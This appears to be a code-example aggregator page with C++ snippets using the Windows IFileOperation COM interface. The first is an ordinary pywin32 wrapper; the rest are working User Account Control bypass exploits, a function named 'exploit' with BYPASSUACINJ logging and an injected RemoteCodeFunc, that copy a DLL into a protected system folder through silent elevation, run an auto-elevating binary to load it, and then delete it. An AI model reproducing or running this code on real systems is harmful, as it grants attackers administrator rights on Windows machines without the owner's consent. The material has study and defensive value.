示例#1
0
// @pymethod |PyIFileOperation|CopyItem|Adds a copy operation to the configuration
PyObject *PyIFileOperation::CopyItem(PyObject *self, PyObject *args)
{
    IFileOperation *pIFO = GetI(self);
    if ( pIFO == NULL )
        return NULL;
    // @pyparm <o PyIShellItem>|Item||Item to be copied
    // @pyparm <o PyIShellItem>|DestinationFolder||Folder into which it will be copied
    // @pyparm str|CopyName|None|New name for the copied file, use None to keep original name
    // @pyparm <o PyGFileOperationProgressSink>|Sink|None|Progress sink for just this operation
    PyObject *obItem;
    PyObject *obDestinationFolder;
    PyObject *obCopyName = Py_None;
    PyObject *obSink = Py_None;
    IShellItem * pItem;
    IShellItem * pDestinationFolder;
    TmpWCHAR CopyName;
    IFileOperationProgressSink * pSink;

    if (!PyArg_ParseTuple(args, "OO|OO:CopyItem", &obItem, &obDestinationFolder, &obCopyName, &obSink))
        return NULL;
    if (!PyWinObject_AsWCHAR(obCopyName, &CopyName, TRUE))
        return NULL;
    if (!PyCom_InterfaceFromPyInstanceOrObject(obItem, IID_IShellItem, (void **)&pItem, FALSE))
        return NULL;
    if (!PyCom_InterfaceFromPyInstanceOrObject(obDestinationFolder, IID_IShellItem, (void **)&pDestinationFolder, FALSE)) {
        PYCOM_RELEASE(pItem);
        return NULL;
    }
    if (!PyCom_InterfaceFromPyInstanceOrObject(obSink, IID_IFileOperationProgressSink, (void **)&pSink, TRUE)) {
        PYCOM_RELEASE(pItem);
        PYCOM_RELEASE(pDestinationFolder);
        return NULL;
    }

    HRESULT hr;
    PY_INTERFACE_PRECALL;
    hr = pIFO->CopyItem( pItem, pDestinationFolder, CopyName, pSink);
    pItem->Release();
    pDestinationFolder->Release();
    if (pSink)
        pSink->Release();
    PY_INTERFACE_POSTCALL;

    if ( FAILED(hr) )
        return PyCom_BuildPyException(hr, pIFO, IID_IFileOperation );
    Py_INCREF(Py_None);
    return Py_None;
}
示例#2
0
	void exploit(BypassUacPaths const * const paths)
	{
		const wchar_t *szElevArgs = L"";
		const wchar_t *szEIFOMoniker = NULL;

		PVOID OldValue = NULL;

		IFileOperation *pFileOp = NULL;
		IShellItem *pSHISource = 0;
		IShellItem *pSHIDestination = 0;
		IShellItem *pSHIDelete = 0;

		BOOL bComInitialised = FALSE;

		const IID *pIID_EIFO = &__uuidof(IFileOperation);
		const IID *pIID_EIFOClass = &__uuidof(FileOperation);
		const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);

		dprintf("[BYPASSUACINJ] szElevDir          = %S", paths->szElevDir);
		dprintf("[BYPASSUACINJ] szElevDirSysWow64  = %S", paths->szElevDirSysWow64);
		dprintf("[BYPASSUACINJ] szElevDll          = %S", paths->szElevDll);
		dprintf("[BYPASSUACINJ] szElevDllFull      = %S", paths->szElevDllFull);
		dprintf("[BYPASSUACINJ] szElevExeFull      = %S", paths->szElevExeFull);
		dprintf("[BYPASSUACINJ] szDllTempPath      = %S", paths->szDllTempPath);

		do
		{
			if (CoInitialize(NULL) != S_OK)
			{
				dprintf("[BYPASSUACINJ] Failed to initialize COM");
				break;
			}

			bComInitialised = TRUE;

			if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**)&pFileOp) != S_OK)
			{
				dprintf("[BYPASSUACINJ] Couldn't create EIFO instance");
				break;
			}

			if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
			{
				dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
				break;
			}

			if (SHCreateItemFromParsingName((PCWSTR)paths->szDllTempPath, NULL, *pIID_ShellItem2, (void**)&pSHISource) != S_OK)
			{
				dprintf("[BYPASSUACINJ] Unable to create item from name (source)");
				break;
			}

			if (SHCreateItemFromParsingName(paths->szElevDir, NULL, *pIID_ShellItem2, (void**)&pSHIDestination) != S_OK)
			{
				dprintf("[BYPASSUACINJ] Unable to create item from name (destination)");
				break;
			}

			if (pFileOp->CopyItem(pSHISource, pSHIDestination, paths->szElevDll, NULL) != S_OK)
			{
				dprintf("[BYPASSUACINJ] Unable to prepare copy op for elev dll");
				break;
			}

			/* Copy the DLL file to the target folder*/
			if (pFileOp->PerformOperations() != S_OK)
			{
				dprintf("[BYPASSUACINJ] Unable to copy elev dll");
				break;
			}

			/* Execute the target binary */
			SHELLEXECUTEINFOW shinfo;
			ZeroMemory(&shinfo, sizeof(shinfo));
			shinfo.cbSize = sizeof(shinfo);
			shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
			shinfo.lpFile = paths->szElevExeFull;
			shinfo.lpParameters = szElevArgs;
			shinfo.lpDirectory = paths->szElevDir;
			shinfo.nShow = SW_HIDE;

			Wow64DisableWow64FsRedirection(&OldValue);
			if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
			{
				WaitForSingleObject(shinfo.hProcess, 10000);
				CloseHandle(shinfo.hProcess);
			}

			if (S_OK != SHCreateItemFromParsingName(paths->szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete)
				|| NULL == pSHIDelete)
			{
				dprintf("[BYPASSUACINJ] Failed to create item from parsing name (delete)");
				break;
			}

			if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
			{
				dprintf("[BYPASSUACINJ] Failed to prepare op for delete");
				break;
			}

			if (pFileOp->PerformOperations() == S_OK)
			{
				dprintf("[BYPASSUACINJ] Successfully deleted dll");

				// bail out this point because we don't need to keep trying to delete
				break;
			}

			SAFERELEASE(pSHIDelete);

			// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
			// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
			// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
			if (S_OK != SHCreateItemFromParsingName(paths->szElevDirSysWow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete)
				|| NULL == pSHIDelete)
			{
				dprintf("[BYPASSUACINJ] Failed to create item from parsing name for delete (shellitem2)");
				break;
			}

			if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
			{
				dprintf("[BYPASSUACINJ] Failed to prepare op for delete (shellitem2)");
				break;
			}

			if (pFileOp->PerformOperations() == S_OK)
			{
				dprintf("[BYPASSUACINJ] Successfully deleted DLL in target directory from SYSWOW64 process");
			}
			else
			{
				dprintf("[BYPASSUACINJ] Failed to delete target DLL");
			}

		} while (0);

		SAFERELEASE(pSHIDelete);
		SAFERELEASE(pSHIDestination);
		SAFERELEASE(pSHISource);
		SAFERELEASE(pFileOp);

		if (bComInitialised)
		{
			CoUninitialize();
		}
	}
static DWORD WINAPI RemoteCodeFunc(LPVOID lpThreadParameter)
{
	// This is the injected code of "part 1."

	// As this code is copied into another process it cannot refer to any static data (i.e. no string, GUID, etc. constants)
	// and it can only directly call functions that are within Kernel32.dll (which is all we need as it lets us call
	// LoadLibrary and GetProcAddress). The data we need (strings, GUIDs, etc.) is copied into the remote process and passed to
	// us in our InjectArgs structure.

	// The compiler settings are important. You have to ensure that RemoteCodeFunc doesn't do any stack checking (since it
	// involves a call into the CRT which may not exist (in the same place) in the target process) and isn't made inline
	// or anything like that. (Compiler optimizations are best turned off.) You need RemoteCodeFunc to be compiled into a
	// contiguous chunk of assembler that calls/reads/writes nothing except its own stack variables and what is passed to it via pArgs.

	// It's also important that all asm jump instructions in this code use relative addressing, not absolute. Jumps to absolute
	// addresses will not be valid after the code is copied to a different address in the target process. Visual Studio seems
	// to use absolute addresses sometimes and relative ones at other times and I'm not sure what triggers one or the other. For example,
	// I had a problem with it turning a lot of the if-statements in this code into absolute jumps when compiled for 32-bit and that
	// seemed to go away when I set the Release build to generate a PDF file, but then they came back again.
	// I never had this problem in February, and 64-bit builds always seem fine, but now in June I'm getting the problem with 32-bit
	// builds on my main machine. However, if I switch to the older compiler install and older Windows SDK that I have on another machine
	// it always builds a working 32-bit (and 64-bit) version, just like it used to. So I guess something in the compiler/SDK has triggered
	// this change but I don't know what. It could just be that things have moved around in memory due to a structure size change and that's
	// triggering the different modes... I don't know!
	//
	// So if the 32-bit version crashes the process you inject into, you probably need to work out how to convince the compiler
	// to generate the code it used to in February. :) Or you could write some code to fix up the jump instructions after copying them,
	// or hand-code the 32-bit asm (seems you can ignore 64-bit as it always works so far), or find a style of if-statement (or equivalent)
	// that always generates relative jumps, or whatever...
	//
	// Take a look at the asm_code_issue.png image that comes with the source to see what the absolute and relative jumps look like.
	//
	// PS: I've never written Intel assembler, and it's many years since I've hand-written any type of assembler, so I may have the wrong end
	// of the stick about some of this! Either way, 32-bit version works when built on my older compiler/SDK install and usually doesn't on
	// the newer install.

	InjectArgs * pArgs = reinterpret_cast< InjectArgs * >(lpThreadParameter);
	
	// Use an elevated FileOperation object to copy a file to a protected folder.
	// If we're in a process that can do silent COM elevation then we can do this without any prompts.

	HMODULE hModuleOle32    = pArgs->fpLoadLibrary(pArgs->szOle32);
	HMODULE hModuleShell32  = pArgs->fpLoadLibrary(pArgs->szShell32);

	if (hModuleOle32
	&&	hModuleShell32)
	{
		// Load the non-Kernel32.dll functions that we need.

		W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPVOID pvReserved) >
			tfpCoInitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoInitialize );

		W7EUtils::GetProcAddr< void (STDAPICALLTYPE *)(void) >
			tfpCoUninitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoUninitialize );

		W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) >
			tfpCoGetObject( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoGetObject );

		W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) >
			tfpCoCreateInstance( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoCreateInstance );

		W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) >
			tfpSHCreateItemFromParsingName( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szSHCreateItemFPN );

		W7EUtils::GetProcAddr< BOOL (STDAPICALLTYPE *)(LPSHELLEXECUTEINFOW lpExecInfo) >
			tfpShellExecuteEx( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szShellExecuteExW );

		if (0 != tfpCoInitialize.f
		&&	0 != tfpCoUninitialize.f
		&&	0 != tfpCoGetObject.f
		&&	0 != tfpCoCreateInstance.f
		&&	0 != tfpSHCreateItemFromParsingName.f
		&&	0 != tfpShellExecuteEx.f)
		{
			if (S_OK == tfpCoInitialize.f(NULL))
			{
				BIND_OPTS3 bo;
				for(int i = 0; i < sizeof(bo); ++i) { reinterpret_cast< BYTE * >(&bo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
				bo.cbStruct = sizeof(bo);
				bo.dwClassContext = CLSCTX_LOCAL_SERVER;

				// For testing other COM objects/methods, start here.
				{
					IFileOperation *pFileOp = 0;
					IShellItem *pSHISource = 0;
					IShellItem *pSHIDestination = 0;
					IShellItem *pSHIDelete = 0;

					// This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
					if (
						(pArgs->szEIFOMoniker  && S_OK == tfpCoGetObject.f( pArgs->szEIFOMoniker, &bo, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
					||	(pArgs->pIID_EIFOClass && S_OK == tfpCoCreateInstance.f( *pArgs->pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER|CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
						)
					if (0    != pFileOp)
					if (S_OK == pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION))
					if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szSourceDll, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)))
					if (0    != pSHISource)
					if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDir, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)))
					if (0    != pSHIDestination)
					if (S_OK == pFileOp->CopyItem(pSHISource, pSHIDestination, pArgs->szElevDll, NULL))
					if (S_OK == pFileOp->PerformOperations())
					{
						// Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
						// (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
						SHELLEXECUTEINFO shinfo;
						for(int i = 0; i < sizeof(shinfo); ++i) { reinterpret_cast< BYTE * >(&shinfo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
						shinfo.cbSize = sizeof(shinfo);
						shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
						shinfo.lpFile = pArgs->szElevExeFull;
						shinfo.lpParameters = pArgs->szElevArgs;
						shinfo.lpDirectory = pArgs->szElevDir;
						shinfo.nShow = SW_SHOW;

						if (tfpShellExecuteEx.f(&shinfo) && shinfo.hProcess != NULL)
						{
							// Wait for the "part 2" target process to finish.
							pArgs->fpWaitForSingleObject(shinfo.hProcess, INFINITE);

							pArgs->fpCloseHandle(shinfo.hProcess);
						}

						// Another standard call to IFileOperation, this time to delete our dummy DLL. We clean up our mess.
						if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDllFull, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDelete)))
						if (0    != pSHIDelete)
						if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
						{
							pFileOp->PerformOperations();
						}
					}

					if (pSHIDelete)      { pSHIDelete->Release();      }
					if (pSHIDestination) { pSHIDestination->Release(); }
					if (pSHISource)      { pSHISource->Release();      }
					if (pFileOp)         { pFileOp->Release();         }
				}

				tfpCoUninitialize.f();
			}
		}
	}

	if (hModuleShell32)  { pArgs->fpFreeLibrary(hModuleShell32);  }
	if (hModuleOle32)    { pArgs->fpFreeLibrary(hModuleOle32);    }

	return 0;
}